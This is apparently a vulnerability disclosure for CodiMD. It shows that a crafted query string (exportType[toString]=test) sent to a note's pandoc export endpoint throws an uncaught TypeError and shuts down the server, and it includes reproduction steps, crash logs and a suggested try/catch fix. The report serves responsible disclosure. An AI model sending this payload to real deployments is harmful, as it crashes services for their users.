Summary

It takes advantage of the fact that the property of req.query.xxx can be overridden.
(Implicit in outputFormats[exportType], toString is performed on variables such as exportType.)

lib/note/noteActions.js#L136 is inside the async function and outside try/catch, so an error here will stop the entire application.

Step to reproduce

1. Create a Note and get the ID from the URL
   Here it is http://localhost:3000/cCijJWDqR3Ot9etF_oFmDw
2. access http://localhost:3000/cCijJWDqR3Ot9etF_oFmDw/pandoc?exportType[toString]=test
   Please replace ID accordingly

TypeError: Cannot convert object to primitive value
at actionPandoc (/home/yoden/work/project/codimd/lib/note/noteActions.js:136:36)
at noteActions (/home/yoden/work/project/codimd/lib/note/index.js:187:7)
2024-01-03T15:32:10.225Z error: An uncaught exception has occured.
2024-01-03T15:32:10.225Z error: Cannot convert object to primitive value
TypeError: Cannot convert object to primitive value
at actionPandoc (/home/yoden/work/project/codimd/lib/note/noteActions.js:136:36)
at noteActions (/home/yoden/work/project/codimd/lib/note/index.js:187:7) {
level: 'error',
timestamp: '2024-01-03T15:32:10.225Z',
[Symbol(level)]: 'error',
[Symbol(message)]: '2024-01-03T15:32:10.225Z error: \tCannot convert object to primitive value'
}
2024-01-03T15:32:10.226Z error: Process will exit now.

Suggested fix

Include the problematic part in the try/catch for proper error handling.